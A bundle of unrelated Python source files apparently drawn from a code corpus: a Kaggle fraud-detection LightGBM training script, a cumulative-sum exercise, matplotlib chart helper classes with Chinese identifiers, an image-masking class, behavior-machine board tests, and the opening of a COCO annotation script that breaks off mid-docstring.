isMORT = len(sys.argv)>1 and sys.argv[1] == "mort"
isMORT = True  # NOTE(review): hard-coded override makes the CLI check above dead code — confirm intended
model='MORT' if isMORT else 'LGB'
NFOLDS = 8
#some_rows = 5000
some_rows = None  # optional row subsample size; None = use the full dataset
data_root = 'E:/Kaggle/ieee_fraud/input/'
#data_root = '../input/'
pkl_path = f'{data_root}/_kyakovlev_{some_rows}.pickle'  # cache of preprocessed frames, keyed by some_rows
def M_PickSamples(pick_samples, df_train, df_test):
    """Take the same fixed-seed random row subset (size *pick_samples*)
    from both frames and return them re-indexed."""
    limit = min(df_train.shape[0], df_test.shape[0])
    random.seed(42)
    subset = random.sample(range(limit), pick_samples)
    picked_train = df_train.iloc[subset, :].reset_index(drop=True)
    picked_test = df_test.iloc[subset, :].reset_index(drop=True)
    print('====== Mort_PickSamples ... df_train={} df_test={}'.format(picked_train.shape, picked_test.shape))
    return picked_train, picked_test
def seed_everything(seed=0):
    """Seed Python's RNG, PYTHONHASHSEED and numpy for reproducible runs."""
    os.environ['PYTHONHASHSEED'] = str(seed)
    random.seed(seed)
    np.random.seed(seed)
def reduce_mem_usage(df, verbose=True):
    """Downcast each numeric column of *df* in place to the smallest dtype
    whose range holds the column's min/max; optionally report memory saved."""
    numerics = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']
    start_mem = df.memory_usage().sum() / 1024**2
    int_candidates = (np.int8, np.int16, np.int32, np.int64)
    float_candidates = (np.float16, np.float32, np.float64)
    for col in df.columns:
        col_type = df[col].dtypes
        if col_type not in numerics:
            continue
        c_min = df[col].min()
        c_max = df[col].max()
        if str(col_type)[:3] == 'int':
            # First integer type whose range strictly contains [min, max].
            for candidate in int_candidates:
                info = np.iinfo(candidate)
                if c_min > info.min and c_max < info.max:
                    df[col] = df[col].astype(candidate)
                    break
        else:
            # First float type that fits; fall back to float64.
            for candidate in float_candidates:
                info = np.finfo(candidate)
                if c_min > info.min and c_max < info.max:
                    df[col] = df[col].astype(candidate)
                    break
            else:
                df[col] = df[col].astype(np.float64)
    end_mem = df.memory_usage().sum() / 1024**2
    if verbose:
        print('Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction)'.format(
            end_mem, 100 * (start_mem - end_mem) / start_mem))
    return df
import lightgbm as lgb
def make_predictions(tr_df, tt_df, features_columns, target, lgb_params, NFOLDS=2):
    """K-fold train/predict over tr_df; returns tt_df[['TransactionID', target]]
    with an averaged 'prediction' column, plus the LAST fold's AUC score.
    Backend (LiteMORT vs LightGBM) is chosen by the module-level isMORT flag."""
    print(f'train_df={tr_df.shape} test_df={tt_df.shape} \nlgb_params={lgb_params}')
    folds = KFold(n_splits=NFOLDS, shuffle=True, random_state=SEED)
    #X, y = tr_df[features_columns], tr_df[target]
    #P, P_y = tt_df[features_columns], tt_df[target]
    y, P_y = tr_df[target], tt_df[target]
    # Out-of-fold-averaged test predictions accumulated across folds.
    predictions = np.zeros(len(tt_df))
    for fold_, (trn_idx, val_idx) in enumerate(folds.split(tr_df[features_columns], y)):
        t0=time.time()
        print('Fold:', fold_)
        tr_x, tr_y = tr_df[features_columns].iloc[trn_idx, :], y[trn_idx]
        vl_x, vl_y = tr_df[features_columns].iloc[val_idx, :], y[val_idx]
        print(len(tr_x), len(vl_x))
        if isMORT:
            # LiteMORT backend: fit with the validation fold as eval set.
            model = LiteMORT(lgb_params).fit(tr_x, tr_y, eval_set=[(vl_x, vl_y)])
            best_iter = 1000
            # pred_val = model.predict(vl_x)
            pred_raw = model.predict_raw(vl_x)
            # y_pred[val_idx] = pred_raw
            fold_score = metrics.roc_auc_score(vl_y, pred_raw)
            pp_p = model.predict_raw(tt_df[features_columns])
        else:
            # LightGBM backend.
            tr_data = lgb.Dataset(tr_x, label=tr_y)
            if LOCAL_TEST:
                # In local testing, validate directly on the held-out month.
                vl_data = lgb.Dataset(tt_df[features_columns], label=P_y)
            else:
                vl_data = lgb.Dataset(vl_x, label=vl_y)
            estimator = lgb.train(
                lgb_params,
                tr_data,
                valid_sets=[tr_data, vl_data],
                verbose_eval=200,
            )
            pred_raw = estimator.predict(vl_x)
            fold_score = metrics.roc_auc_score(vl_y, pred_raw)
            pp_p = estimator.predict(tt_df[features_columns])
            del tr_data, vl_data
        # Average each fold's test prediction.
        predictions += pp_p / NFOLDS
        if LOCAL_TEST:
            # NOTE(review): `X` is undefined here (only the commented-out
            # assignment above defines it) — this branch would raise
            # NameError if LOCAL_TEST were True; confirm before enabling.
            feature_imp = pd.DataFrame(sorted(zip(estimator.feature_importance(), X.columns)),
                                       columns=['Value', 'Feature'])
            print(feature_imp)
        print(f'Fold:{fold_} score={fold_score} time={time.time() - t0:.4g} tr_x={tr_x.shape} val_x={vl_x.shape}')
        del tr_x, tr_y, vl_x, vl_y
        gc.collect()
        #break
    tt_df = tt_df[['TransactionID', target]]
    tt_df['prediction'] = predictions
    gc.collect()
    return tt_df,fold_score
SEED = 42
seed_everything(SEED)
LOCAL_TEST = False  # True = validate on the last month instead of the real test set
TARGET = 'isFraud'
START_DATE = datetime.datetime.strptime('2017-11-30', '%Y-%m-%d')
# Shared parameter dict passed to both LightGBM and LiteMORT.
lgb_params = {
    'objective':'binary',
    'boosting_type':'gbdt',
    'metric':'auc',
    'n_jobs':-1,
    'learning_rate':0.01,
    # 'adaptive'/'prune' are presumably LiteMORT-specific knobs — confirm;
    # LightGBM will simply warn about/ignore unknown keys.
    "adaptive":'weight',
    "prune":0,
    'num_leaves': 2**8,
    'max_depth':-1,
    'tree_learner':'serial',
    'colsample_bytree': 0.7,
    'subsample_freq':1,
    'subsample':0.7,
    'n_estimators':800,
    'max_bin':255,
    'verbose':666,
    'seed': SEED,
    'early_stopping_rounds':100,
}
# Load the preprocessed frames from the local cache when present;
# otherwise rebuild them from the feature-engineering kernel output.
if os.path.isfile(pkl_path):
    print("====== Load pickle @{} ......".format(pkl_path))
    with open(pkl_path, "rb") as fp:
        [train_df, test_df, features_columns] = pickle.load(fp)
else:
    print('Load Data......')
    train_df = pd.read_pickle(f'{data_root}/ieee-fe-with-some-eda/train_df.pkl')
    if LOCAL_TEST:
        # Hold out the last month as a pseudo test set.
        test_df = train_df[train_df['DT_M']==train_df['DT_M'].max()].reset_index(drop=True)
        train_df = train_df[train_df['DT_M']<(train_df['DT_M'].max()-1)].reset_index(drop=True)
    else:
        test_df = pd.read_pickle(f'{data_root}/ieee-fe-with-some-eda/test_df.pkl')
    remove_features = pd.read_pickle(f'{data_root}/ieee-fe-with-some-eda/remove_features.pkl')
    remove_features = list(remove_features['features_to_remove'].values)
    print('Load Data OK\nShape control:', train_df.shape, test_df.shape)
    features_columns = [col for col in list(train_df) if col not in remove_features]
    ########################### Final Minification
    print('reduce_mem_usage......')
    train_df = reduce_mem_usage(train_df)
    test_df = reduce_mem_usage(test_df)
    print('reduce_mem_usage......OK!!!')
    # Optional subsampling; the cache file name is keyed by some_rows.
    if some_rows is not None:
        train_df,test_df = M_PickSamples(some_rows,train_df,test_df)
    with open(pkl_path, "wb") as fp:  # Pickling
        pickle.dump([train_df, test_df, features_columns], fp)
    print("====== Dump pickle @{} ......OK".format(pkl_path))
# Train + predict; LOCAL_TEST scores in-process, otherwise write a submission.
if LOCAL_TEST:
    lgb_params['learning_rate'] = 0.01
    lgb_params['n_estimators'] = 20000
    lgb_params['early_stopping_rounds'] = 100
    test_predictions = make_predictions(train_df, test_df, features_columns, TARGET, lgb_params)
    print(metrics.roc_auc_score(test_predictions[TARGET], test_predictions['prediction']))
else:
    lgb_params['learning_rate'] = 0.005
    lgb_params['n_estimators'] = 5000
    lgb_params['early_stopping_rounds'] = 100
    test_predictions,fold_score = make_predictions(train_df, test_df, features_columns, TARGET, lgb_params, NFOLDS=NFOLDS)
    test_predictions['isFraud'] = test_predictions['prediction']
    # Only write a submission when training on the full data set.
    if some_rows is None:
        # test_predictions[['TransactionID', 'isFraud']].to_csv(f'submit_{some_rows}_{0.5}.csv', index=False,compression='gzip')
        path = f'E:/Kaggle/ieee_fraud/result/[{model}]_{some_rows}_{fold_score:.5f}_F{NFOLDS}_.csv'
        test_predictions[['TransactionID', 'isFraud']].to_csv(path, index=False)  # ,compression='gzip'
        print(f"test_predictions[['TransactionID', 'isFraud']] to_csv @{path}")
input("Press Enter to exit...") | StarcoderdataPython |
6461708 | <filename>PIP/Minor Assignment 7/a7q2.py
def cumulative(lst):
    """Return the running (cumulative) sums of *lst*.

    Fixes: the original re-summed a growing prefix for every index
    (O(n**2)) and had a dead first assignment; itertools.accumulate
    produces the same list in one O(n) pass.
    """
    from itertools import accumulate  # local import keeps the module surface unchanged
    return list(accumulate(lst))
# Demo: cumulative sums of 1..5 -> [1, 3, 6, 10, 15]
lst=[1,2,3,4,5]
print(cumulative(lst))
| StarcoderdataPython |
5055805 | <gh_stars>10-100
#-*- coding: utf-8 -*-
import random,io
import matplotlib.pyplot as plt
import numpy as np
from .public import *
图表颜色 = [
'#F0F8FF', '#FAEBD7', '#00FFFF', '#7FFFD4', '#F0FFFF', '#F5F5DC', '#FFE4C4', '#FFEBCD', '#8A2BE2', '#A52A2A',
'#DEB887', '#5F9EA0', '#7FFF00', '#D2691E', '#FF7F50', '#6495ED', '#FFF8DC', '#DC143C', '#00FFFF', '#008B8B',
'#B8860B', '#A9A9A9', '#006400', '#BDB76B', '#8B008B', '#556B2F', '#FF8C00', '#9932CC', '#8B0000', '#E9967A',
'#8FBC8F', '#483D8B', '#2F4F4F', '#00CED1', '#9400D3', '#FF1493', '#00BFFF', '#696969', '#1E90FF', '#B22222',
'#FFFAF0', '#228B22', '#FF00FF', '#DCDCDC', '#F8F8FF', '#FFD700', '#DAA520', '#808080', '#008000', '#ADFF2F',
'#F0FFF0', '#FF69B4', '#CD5C5C', '#4B0082', '#F0E68C', '#E6E6FA', '#FFF0F5', '#7CFC00', '#FFFACD', '#ADD8E6',
'#F08080', '#E0FFFF', '#90EE90', '#D3D3D3', '#FFB6C1', '#FFA07A', '#20B2AA', '#87CEFA', '#778899', '#B0C4DE',
'#00FF00', '#32CD32', '#FAF0E6', '#FF00FF', '#800000', '#66CDAA', '#BA55D3', '#9370DB', '#3CB371', '#7B68EE',
'#00FA9A', '#48D1CC', '#C71585', '#191970', '#F5FFFA', '#FFE4E1', '#FFE4B5', '#FFDEAD', '#FDF5E6', '#808000',
'#6B8E23', '#FFA500', '#FF4500', '#DA70D6', '#EEE8AA', '#98FB98', '#AFEEEE', '#DB7093', '#FFEFD5', '#FFDAB9',
'#CD853F', '#FFC0CB', '#DDA0DD', '#B0E0E6', '#800080', '#FF0000', '#BC8F8F', '#4169E1', '#8B4513', '#FA8072',
'#FAA460', '#2E8B57', '#FFF5EE', '#A0522D', '#C0C0C0', '#87CEEB', '#6A5ACD', '#708090', '#FFFAFA', '#00FF7F',
'#4682B4', '#D2B48C', '#008080', '#D8BFD8', '#FF6347', '#40E0D0', '#EE82EE', '#F5DEB3', '#F5F5F5', '#FFFF00',
'#9ACD32']
class 圆饼图:
    """Pie chart helper around matplotlib.

    Fix: ``__init__`` previously did ``self.宽高 = ()``, silently discarding
    the width/height argument (the sibling chart classes all store it), so
    the figsize branch in ``生成`` was dead code.
    NOTE(review): the mutable default arguments ([]) are shared between
    instances that mutate them in place — confirm callers never rely on that.
    """
    def __init__(self,标签列表=[],数值列表=[],颜色列表=[],间隔列表=[],起始角度=90,数值显示距离=0.6,保留小数位数=2,阴影=False,显示图例=True,宽高=()):
        self.plt = plt
        self.标签列表 = 标签列表
        self.数值列表 = 数值列表
        self.颜色列表 = 颜色列表
        self.间隔列表 = 间隔列表
        self.起始角度 = 起始角度  # counter-clockwise start angle
        self.数值显示位置 = 数值显示距离  # 0-1, value label distance as a fraction of the radius
        self.保留小数位数 = 保留小数位数  # decimal places shown on the percentage labels
        self.显示阴影 = 阴影  # draw a drop shadow
        self.宽高 = 宽高  # (width, height) figure size; was discarded before the fix
        self.显示图例 = 显示图例
    @异常处理返回类型逻辑型
    def 生成(self,保存地址='',显示=True):
        'Return: PNG image bytes, label list, percentage-label list'
        fig = self.plt.figure()
        self.plt.rcParams['font.sans-serif'] = ['SimHei']  # render CJK text correctly
        if self.宽高:
            self.plt.figure(figsize=(self.宽高[0],self.宽高[1]))
        # Fall back to demo data when nothing was supplied.
        if not self.标签列表 and not self.数值列表:
            self.标签列表 = ['张三','李四','王五']
            self.数值列表 = [111,222,333]
        数量 = len(self.标签列表)
        if not self.颜色列表 or len(self.颜色列表)<数量:
            颜色列表 = random.sample(图表颜色, 数量)
        else:
            颜色列表 = self.颜色列表
        if not self.间隔列表 or len(self.间隔列表)<数量:
            self.间隔列表 = [0 for i in range(数量)]
        patches, text1, text2 = self.plt.pie(self.数值列表,
                                             explode=self.间隔列表,
                                             labels=self.标签列表,
                                             colors=颜色列表,
                                             autopct='%.{}f%%'.format(self.保留小数位数),
                                             shadow=self.显示阴影,
                                             startangle=self.起始角度,
                                             pctdistance=self.数值显示位置)
        self.plt.axis('equal')
        if self.显示图例:
            self.plt.legend()
        if 保存地址:
            self.plt.savefig(保存地址)
        if 显示:
            self.plt.show()
        # Serialise the figure canvas to PNG bytes.
        canvas=fig.canvas
        buffer = io.BytesIO()
        canvas.print_png(buffer)
        data = buffer.getvalue()
        buffer.close()
        标签列表=[]
        比例列表=[]
        for x in range(len(text1)):
            标签列表.append(text1[x].get_text())
            比例列表.append(text2[x].get_text())
        return data,标签列表,比例列表
class 柱状图:
    """Grouped (side-by-side) bar chart helper around matplotlib."""
    def __init__(self,宽高=(),标题="",横向标题="",纵向标题="",标签列表=[],数值列表=[],名称列表=[],颜色列表=[],柱宽=0.25,标题字体大小=20,显示项目名称=True):
        self.np = np
        self.plt = plt
        self.宽高 = 宽高
        self.标题 = 标题
        self.横向标题 = 横向标题
        self.纵向标题 = 纵向标题
        self.标签列表 = 标签列表
        # Values are kept as a list of series; more are added via 加入新数值列表.
        self.数值列表 = [数值列表] if 数值列表 else []
        self.颜色列表 = 颜色列表
        self.名称列表 = 名称列表
        self.柱宽 = 柱宽
        self.显示项目名称 = 显示项目名称
        self.标题字体大小 = 标题字体大小
    @异常处理返回类型逻辑型
    def 加入新数值列表(self,数值列表):
        """Append another data series to be drawn as an extra bar group."""
        self.数值列表.append(数值列表)
    @异常处理返回类型逻辑型
    def 生成(self, 保存地址='', 显示=True):
        """Render the chart; optionally save/show it, and return PNG bytes."""
        self.plt.rcParams['font.sans-serif'] = 'Microsoft YaHei'
        fig = self.plt.figure()
        # Fall back to demo data when nothing was supplied.
        if not self.标签列表 and not self.数值列表:
            self.标签列表 = ['a', 'b', 'c', 'd', 'e']
            self.数值列表 = [[33, 25, 15, 10, 3],[13, 15, 13, 5, 8]]
        数量 = len(self.标签列表)
        x = self.np.arange(数量)
        if self.宽高:
            self.plt.figure(figsize=(self.宽高[0], self.宽高[1]))
        if not self.名称列表 or len(self.名称列表)<len(self.数值列表):
            self.名称列表 = ['名称'+str(i) for i in range(数量)]
        if not self.颜色列表 or len(self.颜色列表) < 数量:
            颜色列表 = random.sample(图表颜色, 数量)
        else:
            颜色列表 = self.颜色列表
        # One bar group per series, shifted sideways by i * bar width.
        for i in range(len(self.数值列表)):
            d = {'tick_label':self.标签列表} if i == 0 else {}
            if self.显示项目名称:
                d['label'] = self.名称列表[i]
            self.plt.bar(x+i*self.柱宽, self.数值列表[i], width=self.柱宽, color=颜色列表[i],**d)
            # Print each value just above its bar.
            for a, b in zip(x, self.数值列表[i]):
                self.plt.text(a+i*self.柱宽, b + 0.1, b, ha='center', va='bottom')
        self.plt.xticks()
        if self.显示项目名称:
            self.plt.legend(loc="upper right")  # upper-right keeps the legend clear of the bars
        self.plt.ylabel(self.纵向标题)
        self.plt.xlabel(self.横向标题)
        self.plt.title(self.标题,fontdict = {'fontsize':self.标题字体大小})
        if 保存地址:
            self.plt.savefig(保存地址)
        if 显示:
            self.plt.show()
        # Serialise the figure canvas to PNG bytes.
        canvas = fig.canvas
        buffer = io.BytesIO()
        canvas.print_png(buffer)
        data = buffer.getvalue()
        buffer.close()
        return data
class 横向柱状图:
    """Horizontal bar chart helper around matplotlib."""
    def __init__(self,宽高=(),标题="",横向标题="",纵向标题="",标签列表=[],数值列表=[],颜色值="",标题字体大小=20,显示项目名称=True):
        # NOTE(review): 显示项目名称 is accepted but never stored/used here.
        self.np = np
        self.plt = plt
        self.宽高 = 宽高
        self.标题 = 标题
        self.横向标题 = 横向标题
        self.纵向标题 = 纵向标题
        self.标签列表 = 标签列表
        self.数值列表 = 数值列表
        self.颜色 = 颜色值
        self.标题字体大小 = 标题字体大小
    @异常处理返回类型逻辑型
    def 生成(self, 保存地址='', 显示=True):
        """Render the chart; optionally save/show it, and return PNG bytes."""
        self.plt.rcParams['font.sans-serif'] = 'Microsoft YaHei'
        fig = self.plt.figure()
        if self.宽高:
            self.plt.figure(figsize=(self.宽高[0], self.宽高[1]))
        if not self.颜色:
            self.颜色 = random.choice(图表颜色)
        # Fall back to demo data when nothing was supplied.
        if not self.标签列表 and not self.数值列表:
            self.标签列表 = ['a', 'b', 'c', 'd', 'e']
            self.数值列表 = [33, 25, 15, 10, 3]
        # NOTE(review): this rebinds fig, so the earlier figure() call above
        # is effectively discarded — confirm intended.
        fig, ax = self.plt.subplots()
        ax.barh(self.标签列表, self.数值列表, color=self.颜色)
        labels = ax.get_xticklabels()
        self.plt.setp(labels, rotation=0, horizontalalignment='right')
        # Print each value to the right of its bar.
        for a, b in zip(self.标签列表, self.数值列表):
            self.plt.text(b + 1, a, b, ha='center', va='center')
        self.plt.ylabel(self.纵向标题)
        self.plt.xlabel(self.横向标题)
        self.plt.title(self.标题,fontdict = {'fontsize':self.标题字体大小})
        if 保存地址:
            self.plt.savefig(保存地址)
        if 显示:
            self.plt.show()
        # Serialise the figure canvas to PNG bytes.
        canvas = fig.canvas
        buffer = io.BytesIO()
        canvas.print_png(buffer)
        data = buffer.getvalue()
        buffer.close()
        return data
class 重叠柱状图:
    """Overlaid bar chart helper: all series share the same x positions."""
    def __init__(self,宽高=(),标题="",横向标题="",纵向标题="",标签列表=[],数值列表=[],名称列表=[],颜色列表=[],柱宽=None,标题字体大小=20,显示项目名称=True):
        self.np = np
        self.plt = plt
        self.宽高 = 宽高
        self.标题 = 标题
        self.横向标题 = 横向标题
        self.纵向标题 = 纵向标题
        self.标签列表 = 标签列表
        # Values are kept as a list of series; more are added via 加入新数值列表.
        self.数值列表 = [数值列表] if 数值列表 else []
        self.颜色列表 = 颜色列表
        self.名称列表 = 名称列表
        self.柱宽 = 柱宽
        self.显示项目名称 = 显示项目名称
        self.标题字体大小 = 标题字体大小
    @异常处理返回类型逻辑型
    def 加入新数值列表(self,数值列表):
        """Append another data series to be drawn on top of the others."""
        self.数值列表.append(数值列表)
    @异常处理返回类型逻辑型
    def 生成(self, 保存地址='', 显示=True):
        """Render the chart; optionally save/show it, and return PNG bytes."""
        self.plt.rcParams['font.sans-serif'] = 'Microsoft YaHei'
        fig = self.plt.figure()
        # Fall back to demo data when nothing was supplied.
        if not self.标签列表 and not self.数值列表:
            self.标签列表 = ['a', 'b', 'c', 'd', 'e']
            self.数值列表 = [[33, 25, 15, 10, 9],[13, 15, 13, 5, 8]]
        数量 = len(self.标签列表)
        x = self.np.arange(数量)
        if self.宽高:
            self.plt.figure(figsize=(self.宽高[0], self.宽高[1]))
        if not self.名称列表 or len(self.名称列表)<len(self.数值列表):
            self.名称列表 = ['名称'+str(i) for i in range(数量)]
        if not self.颜色列表 or len(self.颜色列表) < 数量:
            颜色列表 = random.sample(图表颜色, 数量)
        else:
            颜色列表 = self.颜色列表
        # Series are drawn at the same x positions, so later ones overlay earlier ones.
        for i in range(len(self.数值列表)):
            d = {'tick_label':self.标签列表} if i == 0 else {}
            if self.显示项目名称:
                d['label'] = self.名称列表[i]
            if self.柱宽:
                d['width'] = self.柱宽
            self.plt.bar(self.标签列表, self.数值列表[i], color=颜色列表[i],**d)
            # Print each value just above its bar.
            for a, b in zip(x, self.数值列表[i]):
                self.plt.text(a, b + 0.1, b, ha='center', va='bottom')
        self.plt.xticks(self.np.arange(数量), self.标签列表, rotation=0, fontsize=10)
        if self.显示项目名称:
            self.plt.legend(loc="upper right")  # upper-right keeps the legend clear of the bars
        self.plt.ylabel(self.纵向标题)
        self.plt.xlabel(self.横向标题)
        self.plt.title(self.标题,fontdict = {'fontsize':self.标题字体大小})
        if 保存地址:
            self.plt.savefig(保存地址)
        if 显示:
            self.plt.show()
        # Serialise the figure canvas to PNG bytes.
        canvas = fig.canvas
        buffer = io.BytesIO()
        canvas.print_png(buffer)
        data = buffer.getvalue()
        buffer.close()
        return data
class 折线图:
    """Line chart helper around matplotlib."""
    def __init__(self,宽高=(),标题="",横向标题="",纵向标题="",标签列表=[],数值列表=[],名称列表=[],颜色列表=[],标题字体大小=20,显示项目名称=True,显示数值=True,显示圆点=True):
        self.np = np
        self.plt = plt
        self.宽高 = 宽高
        self.标题 = 标题
        self.横向标题 = 横向标题
        self.纵向标题 = 纵向标题
        self.标签列表 = 标签列表
        # Values are kept as a list of series; more are added via 加入新数值列表.
        self.数值列表 = [数值列表] if 数值列表 else []
        self.颜色列表 = 颜色列表
        self.名称列表 = 名称列表
        self.显示项目名称 = 显示项目名称
        self.标题字体大小 = 标题字体大小
        self.显示数值 = 显示数值  # annotate each data point with its value
        self.显示圆点 = 显示圆点  # draw a marker dot on each data point
    @异常处理返回类型逻辑型
    def 加入新数值列表(self,数值列表):
        """Append another data series to be drawn as an extra line."""
        self.数值列表.append(数值列表)
    @异常处理返回类型逻辑型
    def 生成(self, 保存地址='', 显示=True):
        """Render the chart; optionally save/show it, and return PNG bytes."""
        self.plt.rcParams['font.sans-serif'] = 'Microsoft YaHei'
        fig = self.plt.figure()
        # Fall back to demo data when nothing was supplied.
        if not self.标签列表 and not self.数值列表:
            self.标签列表 = ['a', 'b', 'c', 'd', 'e']
            self.数值列表 = [[33, 25, 15, 10, 3],[13, 15, 13, 5, 8]]
        数量 = len(self.标签列表)
        x = self.np.arange(数量)
        if self.宽高:
            self.plt.figure(figsize=(self.宽高[0], self.宽高[1]))
        if not self.名称列表 or len(self.名称列表)<len(self.数值列表):
            self.名称列表 = ['名称'+str(i) for i in range(数量)]
        if not self.颜色列表 or len(self.颜色列表) < 数量:
            颜色列表 = random.sample(图表颜色, 数量)
        else:
            颜色列表 = self.颜色列表
        for i in range(len(self.数值列表)):
            d = {}
            if self.显示项目名称:
                d['label'] = self.名称列表[i]
            if self.显示圆点:
                d['marker'] = '.'
            self.plt.plot(self.标签列表,self.数值列表[i],color=颜色列表[i],linewidth=1,mfc='w',markersize=10,mfcalt='b',**d)
            if self.显示数值:
                # Print each value just above its point.
                for a, b in zip(self.标签列表, self.数值列表[i]):
                    plt.text(a, b, b, ha='center', va='bottom', fontsize=8)
        if self.显示项目名称:
            self.plt.legend(loc="upper right")  # upper-right keeps the legend clear of the lines
        self.plt.ylabel(self.纵向标题)
        self.plt.xlabel(self.横向标题)
        self.plt.title(self.标题,fontdict = {'fontsize':self.标题字体大小})
        # Dotted grid background at full opacity; remove linestyle for solid grid lines.
        self.plt.grid(alpha=1,linestyle=':')
        if 保存地址:
            self.plt.savefig(保存地址)
        if 显示:
            self.plt.show()
        # Serialise the figure canvas to PNG bytes.
        canvas = fig.canvas
        buffer = io.BytesIO()
        canvas.print_png(buffer)
        data = buffer.getvalue()
        buffer.close()
        return data
4890657 | import numpy as np
class Image:
    '''
    Class to hold image data.

    Attributes
    -----------
    data: np.ndarray
        numpy ndarray containing the image as grayscale float values,
        should be normalized to [0, 1.0]
    masked: np.ndarray
        working copy of ``data`` to which masks are applied in place
    timestamp: astropy.time.Time
        Time when the image was taken
    '''

    def __init__(self, data, timestamp):
        self.data = data
        self.masked = data.copy()  # masks mutate this copy, never `data`
        self.timestamp = timestamp

    def _radius_grid(self, center_row, center_col):
        """Return per-pixel distance from (center_row, center_col), shaped like the image.

        BUG FIX: the previous implementation used np.meshgrid with the
        default 'xy' indexing, which produced a transposed grid of shape
        (cols, rows) -- masking failed for non-square images and swapped
        the row/column roles of the center for square ones.  np.ogrid
        yields broadcastable row/column coordinates in image ('ij') order.
        """
        rows, cols = np.ogrid[:self.data.shape[0], :self.data.shape[1]]
        return np.sqrt((rows - center_row) ** 2 + (cols - center_col) ** 2)

    def mask_inside_radius(self, radius, center_row, center_col):
        """Zero out all pixels at distance <= radius from the given center."""
        r = self._radius_grid(center_row, center_col)
        self.masked[r <= radius] = 0.0

    def mask_outside_radius(self, radius, center_row, center_col):
        """Zero out all pixels at distance >= radius from the given center."""
        r = self._radius_grid(center_row, center_col)
        self.masked[r >= radius] = 0.0

    def add_mask(self, img, threshold=0.5):
        """Zero out pixels wherever ``img`` is at or below ``threshold``."""
        self.masked[img <= threshold] = 0.0

    def reset_mask(self):
        """Discard all masking and restore the original image data."""
        self.masked = self.data.copy()
| StarcoderdataPython |
4944561 | from .compressor import *
from .pop import *
| StarcoderdataPython |
1902043 | <reponame>Schwarzbaer/behavior_machine
from behavior_machine.library import WaitState, IdleState
import pytest
from behavior_machine.board import Board
from behavior_machine.core import State, StateStatus, Machine
class SetState(State):
    """Test state that writes a fixed value to the board under a configured key."""
    _val: str
    _key: str

    def __init__(self, name, key, val):
        super().__init__(name)
        self._val = val
        self._key = key

    def execute(self, board):
        # BUG FIX: the key was hard-coded as the literal "key", silently
        # ignoring the `key` this state was constructed with (the tests
        # below only passed because they happened to use 'key').
        board.set(self._key, self._val)
        return StateStatus.SUCCESS
class GetState(State):
    """Test state that reads a board entry and republishes it under 'output'."""

    _key: str

    def __init__(self, name, key):
        super().__init__(name)
        self._key = key

    def execute(self, board):
        # Copy the configured entry into the well-known 'output' slot so the
        # test can observe it.
        board.set("output", board.get(self._key))
        return StateStatus.SUCCESS
class DummyState(State):
    # Minimal state used by the tests below: does nothing and succeeds.
    def execute(self, board):
        return StateStatus.SUCCESS
def test_external_set_get():
    # A value stored on the board can be read straight back.
    b = Board()
    b.set("x", "key1")
    assert b.get('x') == 'key1'
def test_replaced_set():
    # Setting the same key twice keeps only the latest value.
    b = Board()
    b.set("x", "hello")
    b.set("x", "world")
    assert b.get('x') == 'world'
def test_get_non_exist():
    # Reading a missing key returns None rather than raising.
    b = Board()
    assert b.get('key') is None
def test_board_set_deep_copy():
    # With deep_copy=False, set() stores a reference: later mutations of the
    # original object are visible through the board.
    b = Board()
    test_obj = {
        'hello': 'world'
    }
    b.set('obj', test_obj, deep_copy=False)
    test_obj['hello'] = 'test'
    assert b.get('obj')['hello'] == 'test'
    assert b.get('obj')['hello'] != 'world'
def test_board_get_deep_copy():
    # With get(..., False) the caller receives a reference as well, so it
    # also tracks later mutations of the original object.
    b = Board()
    test_obj = {
        'hello': 'world'
    }
    b.set('obj', test_obj, deep_copy=False)
    rtn_obj = b.get('obj', False)
    assert rtn_obj['hello'] == 'world'
    test_obj['hello'] = 'test'
    assert rtn_obj['hello'] == 'test'
def test_board_exist_func():
    # exist() is an exact-key check: near-misses and prefixes do not match.
    b = Board()
    b.set('hello', 'XXX')
    assert b.exist('hello')
    assert not b.exist('hello2')
    assert not b.exist('hell')
def test_internal_set():
    # A SetState executed inside a machine writes through to the shared board.
    s1 = DummyState('s1')
    set_state = SetState('set', 'key', 'hello')
    s1.add_transition_on_success(set_state)
    exe = Machine("xe", s1)
    b = Board()
    exe.start(b, manual_exec=True)
    exe.update(b, wait=True)
    assert b.get('key') == 'hello'
def test_internal_get():
    # A GetState executed inside a machine can read a value that was placed
    # on the board before the machine started.
    s1 = DummyState('s1')
    get_state = GetState('set', 'key')
    s1.add_transition_on_success(get_state)
    exe = Machine("xe", s1)
    b = Board()
    b.set("key", "hello_get")
    exe.start(b, manual_exec=True)
    exe.update(b, wait=True)
    assert b.get('output') == 'hello_get'
def test_object_set_get(capsys):
    # Board.set deep-copies by default: mutating the original object after
    # set() must not affect what a later get() returns.
    class SetState(State):
        def execute(self, board: Board):
            obj = {
                'hello': [1, 2, 3],
                'name': {
                    'first': 'test'
                }
            }
            board.set('obj', obj)
            obj['name'] = {}  # mutate after set; the stored copy must survive
            return StateStatus.SUCCESS

    class GetState(State):
        def execute(self, board):
            obj = board.get('obj')
            assert obj['hello'] == [1, 2, 3]
            assert obj['name']['first'] == 'test'
            return StateStatus.SUCCESS

    s = SetState('s')
    g = GetState('g')
    w = WaitState('w', 1)
    s.add_transition_on_success(w)
    w.add_transition_on_success(g)
    exe = Machine('xe', s, end_state_ids=['g'])
    exe.run()
    assert exe.is_end()
    assert exe._curr_state._status == StateStatus.SUCCESS
    #assert exe._curr_state.checkStatus(StateStatus.SUCCESS)
def test_object_get_in_transition(capsys):
    # The deep-copied board value must also be readable from a transition
    # predicate (lambda), even after the producer rebinds its local object.
    class SetState(State):
        def execute(self, board: Board):
            obj = {
                'hello': [1, 2, 3],
                'name': {
                    'first': 'test'
                }
            }
            board.set('obj', obj)
            obj = {}
            return StateStatus.SUCCESS

    s = SetState('s')
    w = WaitState('w', 1)
    i = IdleState('i')
    end = IdleState('end')
    s.add_transition_on_success(w)
    w.add_transition_on_success(i)
    i.add_transition(lambda state, board: board.get('obj')
                     ['name']['first'] == 'test', end)
    exe = Machine('xe', s, end_state_ids=['end'])
    exe.run()
    assert exe.is_end()
    # Idle state returns RUNNING instead of SUCCESS
    assert exe._curr_state._status == StateStatus.RUNNING
| StarcoderdataPython |
9644434 | import argparse
import collections
import json
import logging
from pathlib import Path, PurePath
from utils.log import setup_logging
def main():
    """Drop the last frame of every sequence from a COCO-style JSON file.

    Images are grouped by parent directory (the sequence); in each sequence
    the frame with the largest numeric file stem is removed, together with
    every annotation that references a removed image.
    NOTE(review): assumes the input follows the COCO schema ('images',
